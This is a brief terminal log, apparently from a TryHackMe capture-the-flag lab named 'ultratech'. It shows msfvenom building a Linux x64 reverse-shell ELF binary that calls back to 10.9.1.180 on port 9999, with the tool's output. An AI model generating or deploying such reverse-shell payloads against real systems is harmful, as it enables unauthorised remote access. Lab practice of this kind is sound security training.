msfvenom
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.1.180 LPORT=9999 -f elf -o shell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell
msfvenom generated a reverse shell binary in ELF format